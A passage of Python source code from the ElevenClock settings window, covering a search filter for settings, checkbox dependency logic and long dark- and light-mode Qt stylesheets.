self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
else:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: Unknown\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
self.hiddenButton.button.setVisible(False)
self.debbuggingTitle.addWidget(self.hiddenButton)
self.notFoundLabel = QLabel(_("No results were found"))
if isWindowDark():
self.notFoundLabel.setStyleSheet(f"padding-top: {self.getPx(30)}px;font-size: 16pt; font-weight: bold; color: rgba(255, 255, 255, 50%)")
else:
self.notFoundLabel.setStyleSheet(f"padding-top: {self.getPx(30)}px;font-size: 16pt; font-weight: bold; color: rgba(0, 0, 0, 50%)")
self.notFoundLabel.setAlignment(Qt.AlignCenter)
layout.addWidget(self.notFoundLabel)
self.notFoundLabel.hide()
layout.addSpacing(15)
layout.addStretch()
class QStaticWidget(QWidget):
def __init__(self) -> None:
super().__init__()
self.setFixedHeight(1)
self.settingsWidget.setLayout(layout)
self.scrollArea.setWidget(self.settingsWidget)
self.scrollArea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.searchBox = QLineEdit()
self.searchBox.setClearButtonEnabled(True)
self.searchBox.setPlaceholderText(_("Search on the settings"))
self.searchBox.setContentsMargins(0, 0, 25, 0)
self.searchBox.textChanged.connect(self.filter)
titleLayout = QHBoxLayout()
titleLayout.setContentsMargins(0, 0, 0, 0)
titleLayout.setSpacing(0)
titleLayout.addWidget(title, stretch=1)
titleLayout.addWidget(self.searchBox)
svl = QVBoxLayout()
svl.setSpacing(0)
svl.setContentsMargins(0, 0, 0, 0)
svl.addLayout(titleLayout, stretch=0)
svl.addWidget(self.scrollArea, stretch=1)
self.staticVerticalWidget = QWidget()
self.staticVerticalWidget.setMaximumWidth(self.getPx(1000))
self.staticVerticalWidget.setLayout(svl)
self.scrollbar = QScrollBar()
self.scrollArea.setVerticalScrollBar(self.scrollbar)
shl = QHBoxLayout()
shl.setSpacing(0)
shl.setContentsMargins(0, 0, 0, 0)
shl.addSpacing(16)
shl.addWidget(QStaticWidget(), stretch=0)
shl.addWidget(self.staticVerticalWidget, stretch=1)
shl.addWidget(QStaticWidget(), stretch=0)
shl.addWidget(self.scrollbar, stretch=0)
self.vlayout.addLayout(shl)
self.setWindowTitle(_("ElevenClock Settings"))
self.applyStyleSheet()
self.updateCheckBoxesStatus()
w = QWidget()
w.setObjectName("borderBackground")
w.setLayout(self.vlayout)
self.setCentralWidget(w)
self.setMouseTracking(True)
self.resize(self.getPx(1100), self.getPx(700))
self.hwnd = self.winId().__int__()
self.setAttribute(Qt.WA_TranslucentBackground)
if QtWin.isCompositionEnabled():
QtWin.extendFrameIntoClientArea(self, -1, -1, -1, -1)
else:
QtWin.resetExtendedFrame(self)
self.installEventFilter(self)
self.setWindowTitle("")
pixmap = QPixmap(32, 32)
pixmap.fill(Qt.transparent)
self.setWindowIcon(QIcon(pixmap))
def filter(self, query: str):
widgets: list[QSettingsTitle] = (
self.generalSettingsTitle,
self.clockSettingsTitle,
self.clockPosTitle,
self.clockAppearanceTitle,
self.dateTimeTitle,
self.experimentalTitle,
self.languageSettingsTitle,
self.aboutTitle,
self.debbuggingTitle
)
if query != "":
self.announcements.hide()
found = False
for w in widgets:
for item in w.getChildren():
if query.lower() in item.text().lower():
item.show()
found = True
else:
item.hide()
w.searchMode = True
w.resizeEvent(QResizeEvent(w.size(), w.size()))
if not found:
self.notFoundLabel.show()
else:
self.notFoundLabel.hide()
else:
self.announcements.show()
for w in widgets:
for item in w.getChildren():
item.show()
w.searchMode = False
self.notFoundLabel.hide()
w.resizeEvent(QResizeEvent(w.size(), w.size()))
def showEvent(self, event: QShowEvent) -> None:
threading.Thread(target=self.announcements.loadAnnouncements, daemon=True, name="Settings: Announce loader").start()
return super().showEvent(event)
def updateCheckBoxesStatus(self):
# General settings section
if not self.enableUpdates.isChecked(): # Check if check for updates enabled
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically check for updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
if not self.installUpdates.isChecked(): # Check if install updates enabled
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically install available updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
# Date & time settings
if not self.showTime.isChecked(): # Check if time is shown
self.showSeconds.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show time on the clock")))
self.showSeconds.setEnabled(False)
else:
self.showSeconds.setToolTip("")
self.showSeconds.setEnabled(True)
if not self.showDate.isChecked(): # Check if date is shown
self.showWeekCount.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show date on the clock")))
self.showWeekCount.setEnabled(False)
else:
self.showWeekCount.setToolTip("")
self.showWeekCount.setEnabled(True)
if not self.primaryScreen.isChecked(): # Clock is set to be in primary monitor
self.onlyPrimaryScreen.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show the clock on the primary screen")))
self.onlyPrimaryScreen.setEnabled(False)
self.onlyPrimaryScreen.setChecked(False)
else:
self.onlyPrimaryScreen.setToolTip("")
self.onlyPrimaryScreen.setEnabled(True)
if self.enableLowCpuMode.isChecked():
self.disableSystemTrayColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Enable low-cpu mode")))
self.disableSystemTrayColor.setEnabled(False)
self.disableNotificationBadge.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Enable low-cpu mode")))
self.disableNotificationBadge.setEnabled(False)
self.legacyRDPHide.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Enable low-cpu mode")))
self.legacyRDPHide.setEnabled(False)
else:
self.disableSystemTrayColor.setToolTip("")
self.disableSystemTrayColor.setEnabled(True)
self.disableNotificationBadge.setToolTip("")
self.disableNotificationBadge.setEnabled(True)
self.legacyRDPHide.setToolTip("")
self.legacyRDPHide.setEnabled(True)
if self.backgroundcolor.isChecked():
self.disableSystemTrayColor.setEnabled(False)
self.disableSystemTrayColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use a custom background color")))
self.accentBgColor.setEnabled(False)
self.accentBgColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use a custom background color")))
else:
self.disableSystemTrayColor.setEnabled(True)
self.disableSystemTrayColor.setToolTip("")
self.accentBgColor.setEnabled(True)
self.accentBgColor.setToolTip("")
if self.accentBgColor.isChecked():
self.disableSystemTrayColor.setEnabled(False)
self.disableSystemTrayColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use system accent color as background color")))
self.backgroundcolor.setEnabled(False)
self.backgroundcolor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use system accent color as background color")))
else:
self.disableSystemTrayColor.setEnabled(True)
self.disableSystemTrayColor.setToolTip("")
self.backgroundcolor.setEnabled(True)
self.backgroundcolor.setToolTip("")
def applyStyleSheet(self):
self.staticVerticalWidget.setMaximumWidth(self.getPx(1000))
colors = getColors()
if isWindowDark():
if ApplyMica(self.winId().__int__(), MICAMODE.DARK) != 0x0:
GlobalBlur(self.winId(), Dark=True, Acrylic=True, hexColor="#333333ff")
self.iconMode = "white"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.clockPosTitle.setIcon(getPath(f"size_{self.iconMode}.png"))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.setStyleSheet(f"""
#backgroundWindow {{
/*background-color: rgba({colors[3]}, 1);*/
background: transparent;
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba(80, 80, 80, 25%);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 25%);
}}
QSlider {{
background: transparent;
height: {self.getPx(20)}px;
margin-left: {self.getPx(10)}px;
margin-right: {self.getPx(10)}px;
border-radius: {self.getPx(2)}px;
}}
QSlider::groove {{
height: {self.getPx(4)}px;
border: {self.getPx(1)}px solid #212121;
background: #212121;
border-radius: {self.getPx(2)}px;
}}
QSlider::handle {{
border: {self.getPx(4)}px solid #404040;
margin: {self.getPx(-8)}px {self.getPx(-10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[0]});
}}
QSlider::handle:hover {{
border: {self.getPx(3)}px solid #404040;
margin: {self.getPx(-8)}px {self.getPx(-10)}px;
height: {self.getPx(7)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[0]});
}}
QSlider::handle:disabled {{
border: {self.getPx(4)}px solid #404040;
margin: {self.getPx(-8)}px {self.getPx(-10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: #212121;
}}
QSlider::add-page {{
border-radius: {self.getPx(3)}px;
background: #303030;
}}
QSlider::sub-page {{
border-radius: {self.getPx(3)}px;
background: rgb({colors[0]});
}}
QSlider::add-page:disabled {{
border-radius: {self.getPx(2)}px;
background: #212121;
}}
QSlider::sub-page:disabled {{
border-radius: {self.getPx(2)}px;
background: #212121;
}}
QToolTip {{
border: {self.getPx(1)}px solid #222222;
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #262626;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
QLineEdit {{
background-color: #212121;
font-family: "Segoe UI Variable Display";
font-size: 9pt;
width: {self.getPx(300)}px;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: 0.6px solid #262626;
border-bottom: {self.getPx(2)}px solid rgb({colors[1]});
}}
#background,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
/*background-color: #212121;*/
background: transparent;
}}
QScrollArea {{
color: white;
/*background-color: #212121;*/
background: transparent;
}}
QLabel {{
font-family: "Segoe UI Variable Display Semib";
font-weight: medium;
}}
* {{
color: #dddddd;
font-size: 8pt;
}}
#greyishLabel {{
color: #aaaaaa;
}}
#warningLabel {{
color: #bdba00;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #212121;
selection-background-color: rgb({colors[4]});
border: none;
}}
QSpinBox {{
background-color: rgba(81, 81, 81, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid rgba(99, 99, 99, 25%);
}}
QPushButton {{
width: {self.getPx(100)}px;
background-color:rgba(81, 81, 81, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid rgba(99, 99, 99, 25%);
}}
QPushButton:hover {{
background-color:rgba(86, 86, 86, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(100, 100, 100, 25%);
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid rgba(107, 107, 107, 25%);
}}
#AccentButton{{
color: black;
background-color: rgb({colors[1]});
border-color: rgb({colors[1]});
border-bottom-color: rgb({colors[2]});
}}
#AccentButton:hover{{
background-color: rgba({colors[1]}, 80%);
border-color: rgb({colors[2]});
border-bottom-color: rgb({colors[2]});
}}
#AccentButton:pressed{{
color: #555555;
background-color: rgba({colors[1]}, 80%);
border-color: rgb({colors[2]});
border-bottom-color: rgb({colors[2]});
}}
#title{{
margin: {self.getPx(2)}px;
margin-bottom: 0px;
font-weight: bold;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
font-size: 13pt;
border-radius: {self.getPx(4)}px;
}}
#subtitleLabelHover {{
background-color: rgba(20, 20, 20, 1%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
border-radius: {self.getPx(6)}px;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid transparent;
}}
#subtitleLabelHover:hover{{
background-color: rgba(255, 255, 255, 4%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid rgba(36, 36, 36, 50%);
border-bottom: {self.getPx(1)}px solid rgba(25, 25, 25, 50%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: rgba(71, 71, 71, 25%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid rgba(25, 25, 25, 75%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: rgba(71, 71, 71, 0%);
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: rgba(71, 71, 71, 0%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(25, 25, 25, 50%);
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: rgba(71, 71, 71, 0%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(25, 25, 25, 50%);;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: rgba(30, 30, 30, 25%);
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: rgba(71, 71, 71, 0%);
color: #bbbbbb;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #2a2a2a;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[1]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid #444444;
background-color: #303030;
color: #bbbbbb;
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[2]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: {self.getPx(100)}px;
background-color:rgba(81, 81, 81, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solidrgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solidrgba(99, 99, 99, 25%);
}}
#stCmbbx:disabled {{
width: {self.getPx(100)}px;
background-color: #303030;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solidrgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solidrgba(86, 86, 86, 25%);
}}
#stCmbbx:hover {{
background-color:rgba(86, 86, 86, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solidrgba(100, 100, 100, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid rgba(107, 107, 107, 25%);
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid rgba(36, 36, 36, 50%);
padding: {self.getPx(4)}px;
outline: 0px;
padding-right: {self.getPx(0)}px;
background-color: #303030;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background: rgba(255, 255, 255, 6%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QSCrollArea, QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar {{
background: rgba(71, 71, 71, 25%);
margin: {self.getPx(4)}px;
margin-left: 0px;
width: {self.getPx(16)}px;
height: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar:horizontal {{
margin-bottom: 0px;
padding-bottom: 0px;
height: {self.getPx(12)}px;
}}
QScrollBar::handle {{
margin: {self.getPx(3)}px;
min-height: {self.getPx(20)}px;
min-width: {self.getPx(20)}px;
border-radius: {self.getPx(3)}px;
background: rgba(80, 80, 80, 25%);
}}
QScrollBar::handle:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: rgba(112, 112, 112, 25%);
}}
QScrollBar::add-line {{
height: 0;
width: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line {{
height: 0;
width: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow, QScrollBar::down-arrow {{
background: none;
}}
QScrollBar::add-page, QScrollBar::sub-page {{
background: none;
}}
#titlebarLabel {{
color: red;
background: transparent;
font-size: 10pt;
}}
#dialogButtonWidget{{
background-color: #1d1d1d;
}}
""")
else:
if ApplyMica(self.winId().__int__(), MICAMODE.LIGHT) != 0x0:
GlobalBlur(self.winId().__int__(), Dark=False, Acrylic=True, hexColor="#ffffffdd")
self.iconMode = "black"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.clockPosTitle.setIcon(getPath(f"size_{self.iconMode}.png"))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.setStyleSheet(f"""
#backgroundWindow {{
background-color: transparent;
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba({colors[4]}, 1);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 1);
}}
QSlider {{
height: {self.getPx(20)}px;
margin-left: {self.getPx(10)}px;
margin-right: {self.getPx(10)}px;
border-radius: {self.getPx(2)}px;
}}
QSlider::groove {{
height: {self.getPx(4)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
background: #303030;
}}
QSlider::handle {{
border: {self.getPx(4)}px solid #eeeeee;
margin: -{self.getPx(8)}px -{self.getPx(10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[4]});
}}
QSlider::handle:hover {{
border: {self.getPx(1)}px solid #eeeeee;
margin: -{self.getPx(8)}px -{self.getPx(10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[4]});
}}
QSlider::handle:disabled {{
border: {self.getPx(4)}px solid #eeeeee;
margin: -{self.getPx(8)}px -{self.getPx(10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgba(106, 106, 106, 25%);
}}
QSlider::add-page {{
border-radius: {self.getPx(3)}px;
background: #eeeeee;
}}
QSlider::sub-page {{
border-radius: {self.getPx(3)}px;
background: rgb({colors[4]});
}}
QSlider::add-page:disabled {{
border-radius: {self.getPx(3)}px;
background: #eeeeee;
}}
QSlider::sub-page:disabled {{
border-radius: {self.getPx(3)}px;
background: #eeeeee;
}}
QToolTip{{
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #eeeeee;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: rgba(255, 255, 255, 10%);
selection-background-color: rgb({colors[3]});
border: none;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
QLineEdit {{
background-color: #fefefe;
font-family: "Segoe UI Variable Display";
font-size: 9pt;
width: {self.getPx(300)}px;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: 0.6px solid #eeeeee;
border-bottom: {self.getPx(2)}px solid rgb({colors[4]});
}}
#background,QScrollArea,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
background-color: transparent;
}}
* {{
background-color: transparent;
color: black;
font-size: 8pt;
}}
#warningLabel {{
color: #bd0000;
background-color: transparent;
}}
QPushButton {{
width: {self.getPx(100)}px;
background-color: rgba(255, 255, 255, 70%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
QPushButton:hover {{
background-color: rgba(238, 238, 238, 100%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[4]});
border-bottom-color: rgb({colors[5]});
color: white;
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[3]});
color: white;
border-bottom-color: rgb({colors[3]});
}}
#title{{
/*background-color: rgba(255, 255, 255, 10%);
*/margin: {self.getPx(2)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: rgba(255, 255, 255, 10%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border-radius: {self.getPx(4)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#subtitleLabelHover {{
background-color: rgba(0, 0, 0, 1%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
border-radius: {self.getPx(6)}px;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid transparent;
}}
#subtitleLabelHover:hover{{
background-color: rgba(0, 0, 0, 6%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: rgba(255, 255, 255, 10%);
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: rgba(255, 255, 255, 10%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(0)}px;
border-bottom-right-radius: {self.getPx(0)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
border-bottom: {self.getPx(1)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: rgba(255, 255, 255, 10%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: rgba(255, 255, 255, 10%);
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: #eeeeee;
color: rgba(136, 136, 136, 25%);
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #eeeeee;
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(0)}px solid rgba(136, 136, 136, 25%);
background-color: rgb({colors[4]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(0)}px solid rgba(136, 136, 136, 25%);
background-color: rgb({colors[3]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
